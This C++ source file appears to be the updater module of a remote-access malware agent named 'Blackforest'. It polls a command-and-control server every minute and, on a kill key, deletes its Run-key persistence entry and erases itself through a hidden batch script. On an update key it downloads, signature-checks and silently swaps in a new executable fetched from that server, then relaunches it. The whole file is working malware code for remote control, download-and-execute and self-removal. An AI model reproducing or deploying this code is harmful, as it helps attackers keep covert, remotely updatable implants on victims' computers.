#include "core/maintenance/updater.hpp"
#include "crypto/rsa.hpp" // New
#include <vector>
#include <windows.h>
#include <wininet.h>
#include <urlmon.h>
#include <fstream>
#include <sstream>
#include <winreg.h> // Added for registry operations

#pragma comment(lib, "urlmon.lib")

void Updater::Start(const std::string& c2_ip, int port, const std::string& updateKey, const std::string& killKey) {
    std::string baseUrl = "http://" + c2_ip + ":" + std::to_string(port) + "/";
    std::string checkUrl = baseUrl + "update.txt";
    std::string exeUrl = baseUrl + "Blackforest.exe";
    
    char tempPath[MAX_PATH];
    GetTempPathA(MAX_PATH, tempPath);
    std::string checkFile = std::string(tempPath) + "update_check.txt";
    std::string newExe = std::string(tempPath) + "new_agent.exe";
    std::string batFile = std::string(tempPath) + "update.bat";

    while(true) {
        Sleep(60000); // Check every 60 seconds

        // 1. Download Command File
        // Delete cache to ensure fresh download
        DeleteUrlCacheEntryA(checkUrl.c_str());
        HRESULT hr = URLDownloadToFileA(NULL, checkUrl.c_str(), checkFile.c_str(), 0, NULL);
        
        if(hr == S_OK) {
            // 2. Read Content
            std::ifstream f(checkFile);
            std::string content;
            if(f.good()) {
                std::getline(f, content);
            }
            f.close();
            DeleteFileA(checkFile.c_str()); // Cleanup

            // 3. Verify Key
            // Trim whitespace
            content.erase(content.find_last_not_of(" \n\r\t")+1);

            // --- KILL SWITCH ---
            if(content == killKey) {
                // Remove Persistence
                HKEY hKey;
                if(RegOpenKeyExA(HKEY_CURRENT_USER, "Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey) == ERROR_SUCCESS) {
                    RegDeleteValueA(hKey, "BlackforestUpdater");
                    RegCloseKey(hKey);
                }

                // Get Our Path
                char currentPath[MAX_PATH];
                GetModuleFileNameA(NULL, currentPath, MAX_PATH);

                // Suicide Script
                std::string killBat = std::string(tempPath) + "kill.bat";
                std::ofstream bat(killBat);
                bat << "@echo off\n";
                bat << "timeout /t 5 /nobreak > NUL\n";
                bat << "del /f /q \"" << currentPath << "\"\n";
                // Optionally remove directory if empty?
                bat << "del \"%~f0\" & exit\n";
                bat.close();

                ShellExecuteA(NULL, "open", killBat.c_str(), NULL, NULL, SW_HIDE);
                exit(0);
            }
            
            // --- UPDATE ---
            if(content == updateKey) {
                // 4. Trigger Update
                // Download new Exe to temp
                DeleteUrlCacheEntryA(exeUrl.c_str());
                if(URLDownloadToFileA(NULL, exeUrl.c_str(), newExe.c_str(), 0, NULL) == S_OK) {
                    
                    // --- SIGNATURE VERIFICATION (Level 5) ---
                    std::string sigUrl = baseUrl + "update.sig";
                    std::string sigFile = std::string(tempPath) + "update.sig";
                    
                    DeleteUrlCacheEntryA(sigUrl.c_str());
                    if(URLDownloadToFileA(NULL, sigUrl.c_str(), sigFile.c_str(), 0, NULL) != S_OK) {
                         DeleteFileA(newExe.c_str());
                         continue; // Missing signature -> abort
                    }
                    
                    // Read Exe
                    std::ifstream exeStream(newExe, std::ios::binary);
                    std::vector<unsigned char> exeData((std::istreambuf_iterator<char>(exeStream)), std::istreambuf_iterator<char>());
                    exeStream.close();
                    
                    // Read Sig
                    std::ifstream sigStream(sigFile, std::ios::binary);
                    std::vector<unsigned char> sigData((std::istreambuf_iterator<char>(sigStream)), std::istreambuf_iterator<char>());
                    sigStream.close();
                    
                    // Verify
                    RSA rsa;
                    // Real Public Key Blob - Generated by c2/generate_keys.py
                    std::vector<unsigned char> pubKeyBlob = {
                        0x00, 0x01, 0x00, 0x00, 0xd5, 0xab, 0xa2, 0xe7, 0x2c, 0x06, 0x10, 0xcc, 0xc9, 0x81, 0x92, 0x79, 
                        0x29, 0x2a, 0x25, 0x62, 0x2f, 0xc0, 0xce, 0x96, 0xf9, 0xa5, 0x70, 0x1e, 0x06, 0xb0, 0x38, 0x5a, 
                        0xf8, 0xe3, 0x21, 0x6c, 0x74, 0xdc, 0xe6, 0x13, 0xa9, 0xb0, 0xc9, 0xcf, 0xaa, 0x4c, 0x72, 0x07, 
                        0x2e, 0x5b, 0x7c, 0xe6, 0x21, 0x17, 0xf0, 0x59, 0xbf, 0xde, 0x48, 0x9f, 0x97, 0x9d, 0xa6, 0x12, 
                        0x47, 0x7d, 0xea, 0xc1, 0xd6, 0x7f, 0xc3, 0x5f, 0x91, 0x01, 0xe2, 0x38, 0x7d, 0xa9, 0xab, 0xe9, 
                        0xe2, 0x35, 0xae, 0x12, 0x25, 0x3c, 0x54, 0xda, 0xb9, 0x21, 0x2a, 0x80, 0xa5, 0xf4, 0x61, 0x9f, 
                        0xfb, 0xbc, 0x2d, 0x35, 0xfc, 0xfc, 0x98, 0xa3, 0x9c, 0xdb, 0x8c, 0xcf, 0xfb, 0xb1, 0x8c, 0x7b, 
                        0x55, 0xd2, 0xe5, 0xd7, 0x79, 0x7c, 0x19, 0x57, 0x16, 0xf9, 0x05, 0xea, 0x56, 0x9c, 0x85, 0x71, 
                        0x76, 0x5f, 0x23, 0x2d, 0x23, 0xbb, 0x97, 0xd0, 0xcd, 0x94, 0x2e, 0xaa, 0x28, 0x96, 0x6f, 0xd0, 
                        0x06, 0xec, 0x87, 0x1c, 0x12, 0xb7, 0x3c, 0x1a, 0xdf, 0x23, 0x3a, 0xf1, 0x43, 0x46, 0xdf, 0xfc, 
                        0xba, 0x41, 0x4d, 0x34, 0xb4, 0x34, 0x0b, 0xf7, 0x59, 0x9e, 0xcb, 0x5c, 0xed, 0x3b, 0x46, 0x5e, 
                        0xe1, 0x09, 0x84, 0xbd, 0x4e, 0xc8, 0x77, 0xd0, 0x06, 0xd6, 0x80, 0x10, 0x5f, 0x1f, 0xf0, 0x8f, 
                        0x97, 0xc9, 0x35, 0xce, 0xcb, 0x79, 0x76, 0xd0, 0x22, 0x66, 0xff, 0x5d, 0x26, 0xd4, 0x7b, 0x30, 
                        0xb9, 0xb5, 0xe1, 0xc0, 0x6e, 0xfd, 0x07, 0xad, 0x29, 0xb0, 0xeb, 0x04, 0x98, 0xad, 0x82, 0x2a, 
                        0x1f, 0xf8, 0x89, 0x20, 0x75, 0xa1, 0xd1, 0xa9, 0xad, 0xf4, 0x41, 0xda, 0xd3, 0x44, 0x02, 0x65, 
                        0x53, 0x25, 0xf2, 0xe8, 0x4c, 0xdb, 0xfd, 0x3b, 0x7d, 0x8a, 0x0d, 0x5e, 0x6a, 0x1a, 0x77, 0x24, 
                        0xb2, 0x53, 0x8c, 0x3d, 0x03, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01
                    };
                    rsa.ImportPublicKey(pubKeyBlob);
                    
                    if(!rsa.VerifySignature(exeData, sigData)) {
                        // INVALID SIGNATURE
                        DeleteFileA(newExe.c_str());
                        DeleteFileA(sigFile.c_str());
                        continue; // Abort (Trojan horse rejected)
                    }
                    
                    
                    // Clean sig
                    DeleteFileA(sigFile.c_str()); 
                    // --- END VERIFICATION ---

                    // Get Current Path
                    char currentPath[MAX_PATH];
                    GetModuleFileNameA(NULL, currentPath, MAX_PATH);

                    // Size check disabled - RSA signature is sufficient validation
                    /*
                    WIN32_FILE_ATTRIBUTE_DATA curInfo, newInfo;
                    if(GetFileAttributesExA(currentPath, GetFileExInfoStandard, &curInfo) &&
                       GetFileAttributesExA(newExe.c_str(), GetFileExInfoStandard, &newInfo)) {
                        
                        if(curInfo.nFileSizeLow == newInfo.nFileSizeLow) {
                             DeleteFileA(newExe.c_str());
                             continue;
                        }
                    }
                    */

                    // Create Batch Script for replacement
                    std::ofstream bat(batFile);
                    bat << "@echo off\n";
                    bat << "timeout /t 5 /nobreak > NUL\n"; // Wait for us to exit
                    bat << "move /y \"" << newExe << "\" \"" << currentPath << "\"\n";
                    bat << "start \"\" \"" << currentPath << "\"\n";
                    bat << "del \"%~f0\" & exit\n";
                    bat.close();

                    // Execute Batch
                    ShellExecuteA(NULL, "open", batFile.c_str(), NULL, NULL, SW_HIDE);
                    
                    // Die
                    exit(0);
                }
            }
        }
    }
}
